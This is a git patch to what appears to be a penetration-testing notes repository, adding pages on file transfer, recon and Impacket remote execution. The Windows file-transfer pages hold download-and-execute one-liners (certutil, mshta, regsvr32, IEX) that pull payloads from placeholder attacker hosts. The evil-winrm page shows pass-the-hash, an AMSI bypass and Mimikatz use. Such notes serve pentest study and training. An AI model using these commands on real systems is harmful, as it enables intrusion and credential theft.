From a36475faa400303567444b9916284ef32f0ed3cd Mon Sep 17 00:00:00 2001 
From: 584F525F <584F525F_676974706F6F@01111000011011110111001001011111.com> Date: Sat, 23 Mar 2024 16:28:44 -0400 Subject: [PATCH] content-update --- docs/File Transfers/FTP.md | 74 ++++++ docs/File Transfers/File Transfer.md | 226 ------------------ docs/File Transfers/SMB.md | 25 ++ docs/File Transfers/Telnet.md | 12 + .../Windows mshta wmic regsvr32.md | 32 +++ docs/File Transfers/ftpd.md | 5 + docs/File Transfers/scp.md | 45 ++++ docs/File Transfers/windows - cscript.md | 16 ++ docs/File Transfers/windows certutil.md | 12 + .../Initial Enumeration.md | 25 ++ .../{Cracking Files => }/Cracking Files.md | 0 .../{Decoding => }/Decoding.md | 0 .../{Hashcat => }/Hashcat.md | 0 .../{Hydra => }/Hydra.md | 0 .../{JohnTheRipper => }/JohnTheRipper.md | 0 .../{Medusa => }/Medusa.md | 0 .../Passing the hash.md | 0 .../{Unshadow => }/Unshadow.md | 0 .../{Wordlists => }/Wordlists.md | 0 .../{fcrackzip => }/fcrackzip.md | 0 docs/Recon/recon.md | 24 ++ .../Remote connection & execution.md | 4 +- .../Reverse Shell.md | 0 .../atexec.py.md | 8 + .../atexec.py/atexec.py.md | 1 - .../dcomexec.py.md | 9 + .../dcomexec.py/dcomexec.py.md | 1 - .../evil-winrm.md | 51 ++++ .../evil-winrm/evil-winrm.md | 1 - .../psexec.py.md | 9 + .../psexec.py/psexec.py.md | 1 - .../smbexec.py.md | 11 + .../smbexec.py/smbexec.py.md | 1 - docs/Remote connection & execution/winrm.md | 12 + .../winrm/winrm.md | 1 - .../wmiexec.py.md | 9 + .../wmiexec.py/wmiexec.py.md | 1 - docs/Services/{FTP => }/FTP.md | 0 docs/Services/{IMAP => }/IMAP.md | 0 docs/Services/{MSSQL => }/MSSQL.md | 0 docs/Services/{POP3 => }/POP3.md | 0 .../Services/{SAMBA - SMB => }/SAMBA - SMB.md | 0 docs/Services/{SMTP => }/SMTP.md | 0 docs/Services/Services.md | 2 +- docs/Web/{IDOR => }/IDOR.md | 0 .../RFI-LFI File Inclusion.md | 0 .../{Command Injection => }/SQL Injection.md | 0 docs/Web/SQL Injection/SQL Injection.md | 1 - docs/Web/{SSRF => }/SSRF.md | 0 .../XSS (Cross-Site Scripting).md | 0 50 files changed, 383 insertions(+), 236 
deletions(-) create mode 100644 docs/File Transfers/FTP.md delete mode 100644 docs/File Transfers/File Transfer.md create mode 100644 docs/File Transfers/SMB.md create mode 100644 docs/File Transfers/Telnet.md create mode 100644 docs/File Transfers/Windows mshta wmic regsvr32.md create mode 100644 docs/File Transfers/ftpd.md create mode 100644 docs/File Transfers/scp.md create mode 100644 docs/File Transfers/windows - cscript.md create mode 100644 docs/File Transfers/windows certutil.md rename docs/Password Attacks, Cracking & Decoding/{Cracking Files => }/Cracking Files.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Decoding => }/Decoding.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Hashcat => }/Hashcat.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Hydra => }/Hydra.md (100%) rename docs/Password Attacks, Cracking & Decoding/{JohnTheRipper => }/JohnTheRipper.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Medusa => }/Medusa.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Passing the hash => }/Passing the hash.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Unshadow => }/Unshadow.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Wordlists => }/Wordlists.md (100%) rename docs/Password Attacks, Cracking & Decoding/{fcrackzip => }/fcrackzip.md (100%) create mode 100644 docs/Recon/recon.md rename docs/{Reverse Shell => Remote connection & execution}/Reverse Shell.md (100%) create mode 100644 docs/Remote connection & execution/atexec.py.md delete mode 100644 docs/Remote connection & execution/atexec.py/atexec.py.md create mode 100644 docs/Remote connection & execution/dcomexec.py.md delete mode 100644 docs/Remote connection & execution/dcomexec.py/dcomexec.py.md create mode 100644 docs/Remote connection & execution/evil-winrm.md delete mode 100644 docs/Remote connection & execution/evil-winrm/evil-winrm.md create mode 100644 docs/Remote connection & execution/psexec.py.md 
delete mode 100644 docs/Remote connection & execution/psexec.py/psexec.py.md create mode 100644 docs/Remote connection & execution/smbexec.py.md delete mode 100644 docs/Remote connection & execution/smbexec.py/smbexec.py.md create mode 100644 docs/Remote connection & execution/winrm.md delete mode 100644 docs/Remote connection & execution/winrm/winrm.md create mode 100644 docs/Remote connection & execution/wmiexec.py.md delete mode 100644 docs/Remote connection & execution/wmiexec.py/wmiexec.py.md rename docs/Services/{FTP => }/FTP.md (100%) rename docs/Services/{IMAP => }/IMAP.md (100%) rename docs/Services/{MSSQL => }/MSSQL.md (100%) rename docs/Services/{POP3 => }/POP3.md (100%) rename docs/Services/{SAMBA - SMB => }/SAMBA - SMB.md (100%) rename docs/Services/{SMTP => }/SMTP.md (100%) rename docs/Web/{IDOR => }/IDOR.md (100%) rename docs/Web/{RFI-LFI File Inclusion => }/RFI-LFI File Inclusion.md (100%) rename docs/Web/{Command Injection => }/SQL Injection.md (100%) delete mode 100644 docs/Web/SQL Injection/SQL Injection.md rename docs/Web/{SSRF => }/SSRF.md (100%) rename docs/Web/{XSS (Cross-Site Scripting) => }/XSS (Cross-Site Scripting).md (100%) diff --git a/docs/File Transfers/FTP.md b/docs/File Transfers/FTP.md new file mode 100644 index 000000000..24c2e20b4 --- /dev/null +++ b/docs/File Transfers/FTP.md 
@@ -0,0 +1,74 @@
+### FTP - File Transfer Protocol
+
+#### commands
+
+```bash
+ftp ip_address
+#enter username
+#enter password
+
+#print working directory
+pwd
+
+#list file in directory
+ls
+
+#change working directory
+cd /dir/dir
+cd ../dir
+cd ..
+cdup
+
+#creating directory
+mkdir new_dir
+
+#removing directory
+rmdir new_dir
+
+#change transfer mode
+ascii #suitable for transferring text data such as HTML files.
+binary #
+
+#download and upload a file
+get Download.txt
+put Upload.txt
+
+#download upload multiple files
+mget *.txt
+mget file?.txt file?.zip
+mput file.jpg file.jpg
+mput *.zip
+
+#delete file | multiple files
+delete file.zip
+mdelete *.zip
+
+#rename a file
+rename name.txt new_name.txt
+
+# append remote file data
+append new_data.sh old_data.sh
+
+#change file permissions
+chmod 777 file.sh
+chmod +x file.sh
+
+#to exit
+bye
+exit
+quit
+```
+
+#### switches
+
+```bash
+-4 Use only IPv4 to contact any host.
+-6 Use IPv6 only.
+-e Disables command editing and history support, if it was compiled into the ftp executable. Otherwise, it does nothing.
+-p Use passive mode for data transfers. Allows the use of ftp in environments where a firewall prevents connections from the outside world back to the client machine. Requires the ftp server to support the PASV command .
+-i Turns off interactive prompting during multiple file transfers.
+-n Restrains ftp from attempting auto-login upon initial connection. If auto-login is enabled, ftp checks the .netrc (see netrc ) file in the user’s home directory for an entry describing an account on the remote machine. If no entry exists, ftp prompts for the remote machine login name (the default is the user identity on the local machine), and, if necessary, prompt for a password and an account with which to login.
+-g Disables file name globbing.
+-v The verbose option forces ftp to show all responses from the remote server, as well as report on data transfer statistics.
+-d Enables debugging.
+```
\ No newline at end of file
diff --git a/docs/File Transfers/File Transfer.md b/docs/File Transfers/File Transfer.md
deleted file mode 100644
index 1b44a8693..000000000
--- a/docs/File Transfers/File Transfer.md
+++ /dev/null
@@ -1,226 +0,0 @@ -### Telnet - -```bash -telnet ip_address -ls -PASV -TYPE A -STAT -get Download.txt -put Upload.txt -Exit -``` - -### FTP - File Transfer Protocol - -#### commands - -```bash -ftp ip_address -#enter username -#enter password - -#print working directory -pwd - -#list file in directory -ls - -#change working directory -cd /dir/dir -cd ../dir -cd .. -cdup - -#creating directory -mkdir new_dir - -#removing directory -rmdir new_dir - -#change transfer mode -ascii #suitable for transferring text data such as HTML files. -binary # - -#download and upload a file -get Download.txt -put Upload.txt - -#download upload multiple files -mget *.txt -mget file?.txt file?.zip -mput file.jpg file.jpg -mput *.zip - -#delete file | multiple files -delete file.zip -mdelete *.zip - -#rename a file -rename name.txt new_name.txt - -# append remote file data -append new_data.sh old_data.sh - -#change file permissions -chmod 777 file.sh -chmod +x file.sh - -#to exit -bye -exit -quit -``` - -#### switches - -```bash --4 Use only IPv4 to contact any host. --6 Use IPv6 only. --e Disables command editing and history support, if it was compiled into the ftp executable. Otherwise, it does nothing. --p Use passive mode for data transfers. Allows the use of ftp in environments where a firewall prevents connections from the outside world back to the client machine. Requires the ftp server to support the PASV command . --i Turns off interactive prompting during multiple file transfers. --n Restrains ftp from attempting auto-login upon initial connection. If auto-login is enabled, ftp checks the .netrc (see netrc ) file in the user’s home directory for an entry describing an account on the remote machine. If no entry exists, ftp prompts for the remote machine login name (the default is the user identity on the local machine), and, if necessary, prompt for a password and an account with which to login. --g Disables file name globbing. 
--v The verbose option forces ftp to show all responses from the remote server, as well as report on data transfer statistics. --d Enables debugging. -``` - -### SCP - Secure Copy Protocol - -#### commands - -```shell -scp -scp o s_path d_path - -#specifying port with -P -scp -P 5562 file @: -scp -P 5562 f? u@ip:r_file_path - -# uploading a file -scp file @: -scp file u@ip:r_file_path - -# uploading multiple files -scp file1 file2 @: -scp f? f? u@ip:r_dir_path - -# downloading a file -scp @: -scp u@ip:r_file_path l_file_path - -# downloading multiple files -scp @: . -scp u@ip:dir_path/\f?,f? . - -# downloading a directory -scp -r @: -scp -r l_dir_path u@ip:r_dir_path -``` - -#### switches - -```shell --r # transfer directory --v # see the transfer details --C # copy files with compression --l 800 # limit bandwidth with 800 --p # preserving the original attributes of the copied files --P # connection port --q # hidden the output -``` - -### certutil - windows powershell - -```powershell -# Multiple ways to download and execute files: -certutil -urlcache -split -f http://webserver/payload payload - -# Execute a specific .dll: -certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll - -# Execute an .exe: -certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe -``` - -### cscript - windows powershell -```powershell -# Execute file from a WebDav server: -cscript //E:jscript \\IP\folder\payload.txt - -# Download using wget.vbs -cscript wget.vbs http://IP/file.exe file.exe - -# One liner download file from WebServer: -powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" -powershell -exec bypass -c "(new-object 
System.Net.WebClient).DownloadFile('http://IP/file.exe','C:\Users\user\Desktop\file.exe')" - -# Download from WebDAV Server: -powershell -exec bypass -f \\IP\folder\payload.ps1 -``` - -### Windows mshta wmic regsvr32 -```powershell -# Method 1 -mshta vbscript:Close(Execute("GetObject(""script:http://IP/payload.sct"")")) - -# Method 2 -mshta http://IP/payload.hta - -# Method 3 (Using WebDav) -mshta \\IP\payload.hta - -#Download and execute XSL using wmic -wmic os get /format:"https://webserver/payload.xsl" - - -# Download and execute over a WebServer: -regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll - -# Using WebDAV -regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll - -# Powershell Cmdlet -Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename" - -# Powershell One-Line -(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename") - -# In Memory Execution -IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1') -``` - -### SMB -```bash -# Set up a SMB server using smbserver.py from impacket -smbserver.py SHARE_NAME path/to/share - -# From target Windows: -net view \\KALI_IP -(Should display the SHARE_NAME) - -dir \\KALI_IP\SHARE_NAME -copy \\KALI_IP\SHARE_NAME\file.exe . - -# Looking at smbserver logs you also grab the NTLMv2 hashes of your current Windows user -# can be usefull to PTH, or crack passwords - -# Since Windows 10, you can't do anonymous smb server anymore -sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon" -net use Z: \\192.168.30.130\SDFR /user:peon peon -net use Z: /delete /y -``` - -```bash -impacket smbserver -net use z: \\attackerip\sharename -``` - - -### ftpd - -```shell -/etc/init.d/pure-ftpd -``` - diff --git a/docs/File Transfers/SMB.md b/docs/File Transfers/SMB.md new file mode 100644 index 000000000..c5409225c --- /dev/null +++ b/docs/File Transfers/SMB.md 
@@ -0,0 +1,25 @@
+### SMB
+```bash
+# Set up a SMB server using smbserver.py from impacket
+smbserver.py SHARE_NAME path/to/share
+
+# From target Windows:
+net view \\KALI_IP
+(Should display the SHARE_NAME)
+
+dir \\KALI_IP\SHARE_NAME
+copy \\KALI_IP\SHARE_NAME\file.exe .
+
+# Looking at smbserver logs you also grab the NTLMv2 hashes of your current Windows user
+# can be usefull to PTH, or crack passwords
+
+# Since Windows 10, you can't do anonymous smb server anymore
+sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"
+net use Z: \\192.168.30.130\SDFR /user:peon peon
+net use Z: /delete /y
+```
+
+```bash
+impacket smbserver
+net use z: \\attackerip\sharename
+```
\ No newline at end of file
diff --git a/docs/File Transfers/Telnet.md b/docs/File Transfers/Telnet.md
new file mode 100644
index 000000000..e745d99df
--- /dev/null
+++ b/docs/File Transfers/Telnet.md
@@ -0,0 +1,12 @@
+### Telnet
+
+```bash
+telnet ip_address
+ls
+PASV
+TYPE A
+STAT
+get Download.txt
+put Upload.txt
+Exit
+```
diff --git a/docs/File Transfers/Windows mshta wmic regsvr32.md b/docs/File Transfers/Windows mshta wmic regsvr32.md
new file mode 100644
index 000000000..59213f8b3
--- /dev/null
+++ b/docs/File Transfers/Windows mshta wmic regsvr32.md
@@ -0,0 +1,32 @@
+
+### Windows mshta wmic regsvr32
+
+```powershell
+# Method 1
+mshta vbscript:Close(Execute("GetObject(""script:http://IP/payload.sct"")"))
+
+# Method 2
+mshta http://IP/payload.hta
+
+# Method 3 (Using WebDav)
+mshta \\IP\payload.hta
+
+#Download and execute XSL using wmic
+wmic os get /format:"https://webserver/payload.xsl"
+
+
+# Download and execute over a WebServer:
+regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
+
+# Using WebDAV
+regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
+
+# Powershell Cmdlet
+Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
+
+# Powershell One-Line
+(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename")
+
+# In Memory Execution
+IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
+```
\ No newline at end of file
diff --git a/docs/File Transfers/ftpd.md b/docs/File Transfers/ftpd.md
new file mode 100644
index 000000000..84db5235a
--- /dev/null
+++ b/docs/File Transfers/ftpd.md
@@ -0,0 +1,5 @@
+### ftpd
+
+```shell
+/etc/init.d/pure-ftpd
+```
\ No newline at end of file
diff --git a/docs/File Transfers/scp.md b/docs/File Transfers/scp.md
new file mode 100644
index 000000000..79dc03aff
--- /dev/null
+++ b/docs/File Transfers/scp.md
@@ -0,0 +1,45 @@
+### SCP - Secure Copy Protocol
+
+#### commands
+
+```shell
+scp
+scp o s_path d_path
+
+#specifying port with -P
+scp -P 5562 file @:
+scp -P 5562 f? u@ip:r_file_path
+
+# uploading a file
+scp file @:
+scp file u@ip:r_file_path
+
+# uploading multiple files
+scp file1 file2 @:
+scp f? f? u@ip:r_dir_path
+
+# downloading a file
+scp @:
+scp u@ip:r_file_path l_file_path
+
+# downloading multiple files
+scp @: .
+scp u@ip:dir_path/\f?,f? .
+
+# downloading a directory
+scp -r @:
+scp -r l_dir_path u@ip:r_dir_path
+```
+
+#### switches
+
+```shell
+-r # transfer directory
+-v # see the transfer details
+-C # copy files with compression
+-l 800 # limit bandwidth with 800
+-p # preserving the original attributes of the copied files
+-P # connection port
+-q # hidden the output
+```
+
diff --git a/docs/File Transfers/windows - cscript.md b/docs/File Transfers/windows - cscript.md
new file mode 100644
index 000000000..9f545dccf
--- /dev/null
+++ b/docs/File Transfers/windows - cscript.md
@@ -0,0 +1,16 @@
+### cscript - windows powershell
+
+```powershell
+# Execute file from a WebDav server:
+cscript //E:jscript \\IP\folder\payload.txt
+
+# Download using wget.vbs
+cscript wget.vbs http://IP/file.exe file.exe
+
+# One liner download file from WebServer:
+powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
+powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.exe','C:\Users\user\Desktop\file.exe')"
+
+# Download from WebDAV Server:
+powershell -exec bypass -f \\IP\folder\payload.ps1
+```
diff --git a/docs/File Transfers/windows certutil.md b/docs/File Transfers/windows certutil.md
new file mode 100644
index 000000000..347ec95cd
--- /dev/null
+++ b/docs/File Transfers/windows certutil.md
@@ -0,0 +1,12 @@
+### certutil - windows powershell
+
+```powershell
+# Multiple ways to download and execute files:
+certutil -urlcache -split -f http://webserver/payload payload
+
+# Execute a specific .dll:
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
+
+# Execute an .exe:
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
+```
diff --git a/docs/Initial Enumeration/Initial Enumeration.md b/docs/Initial Enumeration/Initial Enumeration.md
index e69de29bb..3f1550456 100644
--- a/docs/Initial Enumeration/Initial Enumeration.md
+++ b/docs/Initial Enumeration/Initial Enumeration.md
@@ -0,0 +1,25 @@
+# nmap
+
+```shell
+sudo nmap -sV -A --min-rate 1500 x.x.x.x
+sudo nmap -p x,x,x --script vuln x.x.x.x
+```
+
+# metasploit
+```shell
+systemctl start postgresql
+msfdb init
+msfconsole
+db_status
+workspace -a
+workspace
+
+db_nmap -sV -A -p- x.x.x.x
+hosts
+services
+vulns
+
+```
+
+# Nikto
+[Nikto web server scanner](https://github.com/sullo/nikto)
diff --git a/docs/Password Attacks, Cracking & Decoding/Cracking Files/Cracking Files.md b/docs/Password Attacks, Cracking & Decoding/Cracking Files.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Cracking Files/Cracking Files.md
rename to docs/Password Attacks, Cracking & Decoding/Cracking Files.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Decoding/Decoding.md b/docs/Password Attacks, Cracking & Decoding/Decoding.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Decoding/Decoding.md
rename to docs/Password Attacks, Cracking & Decoding/Decoding.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Hashcat/Hashcat.md b/docs/Password Attacks, Cracking & Decoding/Hashcat.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Hashcat/Hashcat.md
rename to docs/Password Attacks, Cracking & Decoding/Hashcat.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Hydra/Hydra.md b/docs/Password Attacks, Cracking & Decoding/Hydra.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Hydra/Hydra.md
rename to docs/Password Attacks, Cracking & Decoding/Hydra.md
diff --git a/docs/Password Attacks, Cracking & Decoding/JohnTheRipper/JohnTheRipper.md b/docs/Password Attacks, Cracking & Decoding/JohnTheRipper.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/JohnTheRipper/JohnTheRipper.md
rename to docs/Password Attacks, Cracking & Decoding/JohnTheRipper.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Medusa/Medusa.md b/docs/Password Attacks, Cracking & Decoding/Medusa.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Medusa/Medusa.md
rename to docs/Password Attacks, Cracking & Decoding/Medusa.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Passing the hash/Passing the hash.md b/docs/Password Attacks, Cracking & Decoding/Passing the hash.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Passing the hash/Passing the hash.md
rename to docs/Password Attacks, Cracking & Decoding/Passing the hash.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Unshadow/Unshadow.md b/docs/Password Attacks, Cracking & Decoding/Unshadow.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Unshadow/Unshadow.md
rename to docs/Password Attacks, Cracking & Decoding/Unshadow.md
diff --git a/docs/Password Attacks, Cracking & Decoding/Wordlists/Wordlists.md b/docs/Password Attacks, Cracking & Decoding/Wordlists.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/Wordlists/Wordlists.md
rename to docs/Password Attacks, Cracking & Decoding/Wordlists.md
diff --git a/docs/Password Attacks, Cracking & Decoding/fcrackzip/fcrackzip.md b/docs/Password Attacks, Cracking & Decoding/fcrackzip.md
similarity index 100%
rename from docs/Password Attacks, Cracking & Decoding/fcrackzip/fcrackzip.md
rename to docs/Password Attacks, Cracking & Decoding/fcrackzip.md
diff --git a/docs/Recon/recon.md b/docs/Recon/recon.md
new file mode 100644
index 000000000..3ae97ee41
--- /dev/null
+++ b/docs/Recon/recon.md
@@ -0,0 +1,24 @@
+# recon
+
+[DNSdumpster](https://dnsdumpster.com/)
+[Shodan.io](https://www.shodan.io/)
+
+```shell
+whois
+ping
+telnet
+traceroute
+nc
+```
+
+```shell
+#We can use the favicon link of a website to find the framework used
+curl https://website.com/favicon.ico | md5sum
+#this calculates md5 hash value after downloading the favicon
+#hash can be used to lookup on
+```
+
+```shell
+#Manually discovering HTTP headers
+curl http://website.com/ -v
+```
diff --git a/docs/Remote connection & execution/Remote connection & execution.md b/docs/Remote connection & execution/Remote connection & execution.md
index 8318c86b3..d8542a146 100644
--- a/docs/Remote connection & execution/Remote connection & execution.md
+++ b/docs/Remote connection & execution/Remote connection & execution.md
@@ -1 +1,3 @@
-Test
\ No newline at end of file
+> Resources
+[Impacket – SecureAuth](https://www.secureauth.com/labs/open-source-tools/impacket/)
+[Offensive Security Cheatsheet](https://cheatsheet.haax.fr/windows-systems/exploitation/remote_execution_techniques/)
diff --git a/docs/Reverse Shell/Reverse Shell.md b/docs/Remote connection & execution/Reverse Shell.md
similarity index 100%
rename from docs/Reverse Shell/Reverse Shell.md
rename to docs/Remote connection & execution/Reverse Shell.md
diff --git a/docs/Remote connection & execution/atexec.py.md b/docs/Remote connection & execution/atexec.py.md
new file mode 100644
index 000000000..722635abf
--- /dev/null
+++ b/docs/Remote connection & execution/atexec.py.md
@@ -0,0 +1,8 @@
+# atexec.py
+
+This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
+
+```shell
+# This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
+atexec.py domain/user:password@IP
+```
diff --git a/docs/Remote connection & execution/atexec.py/atexec.py.md b/docs/Remote connection & execution/atexec.py/atexec.py.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/atexec.py/atexec.py.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Remote connection & execution/dcomexec.py.md b/docs/Remote connection & execution/dcomexec.py.md
new file mode 100644
index 000000000..cf343c7f0
--- /dev/null
+++ b/docs/Remote connection & execution/dcomexec.py.md
@@ -0,0 +1,9 @@
+# dcomexec.py
+
+A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
+
+```shell
+# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
+## Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
+dcomexec.py domain/user:password@IP
+```
diff --git a/docs/Remote connection & execution/dcomexec.py/dcomexec.py.md b/docs/Remote connection & execution/dcomexec.py/dcomexec.py.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/dcomexec.py/dcomexec.py.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Remote connection & execution/evil-winrm.md b/docs/Remote connection & execution/evil-winrm.md
new file mode 100644
index 000000000..4aaf05eac
--- /dev/null
+++ b/docs/Remote connection & execution/evil-winrm.md
@@ -0,0 +1,51 @@
+# evil-winrm
+
+```shell
+#install - Ruby
+gem install evil-winrm
+
+#example
+evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
+
+#enable SSL
+evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s
+
+#Login with NTLM Hash -Pass The Hash Attack
+evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38
+
+#Login with the key using Evil-winrm
+evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S
+
+#Load Powershell Script - example with mimikatz.ps1
+evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
+Bypass-4MSI
+Invoke-Mimikatz.ps1
+Invoke-Mimikatz
+
+#Store logs with Evil-winrm
+evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l
+
+#Disable Remote Path Completion
+evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N
+
+#Disable Coloured Interface
+evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n
+
+#Run Executables File
+evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
+Bypass-4MSI
+menu
+Invoke-Binary /opt/privsc/winPEASx64.exe
+
+#Service Enumeration with Evil-winrm
+menu
+services
+
+#File Transfer with Evil-winrm
+upload /root/notes.txt .
+download notes.txt /root/raj/notes.txt
+
+#Use Evil-winrm From Docker
+docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'
+
+```
diff --git a/docs/Remote connection & execution/evil-winrm/evil-winrm.md b/docs/Remote connection & execution/evil-winrm/evil-winrm.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/evil-winrm/evil-winrm.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Remote connection & execution/psexec.py.md b/docs/Remote connection & execution/psexec.py.md
new file mode 100644
index 000000000..eb2d96283
--- /dev/null
+++ b/docs/Remote connection & execution/psexec.py.md
@@ -0,0 +1,9 @@
+# psexec.py
+
+PSEXEC like functionality example using RemComSvc ([https://github.com/kavika13/RemCom](https://github.com/kavika13/RemCom)).
+
+```shell
+# psexec
+# PSEXEC like functionality example using RemComSvc(https://github.com/kavika13/RemCom).
+psexec.py domain/user:password@IP
+```
diff --git a/docs/Remote connection & execution/psexec.py/psexec.py.md b/docs/Remote connection & execution/psexec.py/psexec.py.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/psexec.py/psexec.py.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Remote connection & execution/smbexec.py.md b/docs/Remote connection & execution/smbexec.py.md
new file mode 100644
index 000000000..0b6dd8f83
--- /dev/null
+++ b/docs/Remote connection & execution/smbexec.py.md
@@ -0,0 +1,11 @@
+# smbexec.py
+
+A similar approach to PSEXEC w/o using RemComSvc. The technique is described [here](https://web.archive.org/web/20140625065218/http://blog.accuvant.com/rdavisaccuvant/owning-computers-without-shell-access/). Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
+
+```shell
+# smbexec
+# A similar approach to PSEXEC w/o using RemComSvc. The technique is described here.
+# Instantiating a local smbserver to receive the output of the commands.
+# This is useful in the situation where the target machine does NOT have a writeable share available.
+smbexec.py domain/user:password@IP
+```
diff --git a/docs/Remote connection & execution/smbexec.py/smbexec.py.md b/docs/Remote connection & execution/smbexec.py/smbexec.py.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/smbexec.py/smbexec.py.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Remote connection & execution/winrm.md b/docs/Remote connection & execution/winrm.md
new file mode 100644
index 000000000..653594a60
--- /dev/null
+++ b/docs/Remote connection & execution/winrm.md
@@ -0,0 +1,12 @@
+# winrm
+
+```powershell
+#To Enable PSRemoting
+Enable-PSRemoting -Force
+
+#Adding a trusted host
+winrm s winrm/config/client '@{TrustedHosts="192.5.2.30"}'
+
+#running commands
+Invoke-Command -ComputerName WINB -ScriptBlock { echo "Hello World"}
+```
diff --git a/docs/Remote connection & execution/winrm/winrm.md b/docs/Remote connection & execution/winrm/winrm.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/winrm/winrm.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Remote connection & execution/wmiexec.py.md b/docs/Remote connection & execution/wmiexec.py.md
new file mode 100644
index 000000000..3915513f5
--- /dev/null
+++ b/docs/Remote connection & execution/wmiexec.py.md
@@ -0,0 +1,9 @@
+# winexec.py
+
+A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
+
+```shell
+# A semi-interactive shell, used through Windows Management Instrumentation.
+# It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
+wmiexec.py domain/user:password@IP
+```
diff --git a/docs/Remote connection & execution/wmiexec.py/wmiexec.py.md b/docs/Remote connection & execution/wmiexec.py/wmiexec.py.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Remote connection & execution/wmiexec.py/wmiexec.py.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Services/FTP/FTP.md b/docs/Services/FTP.md
similarity index 100%
rename from docs/Services/FTP/FTP.md
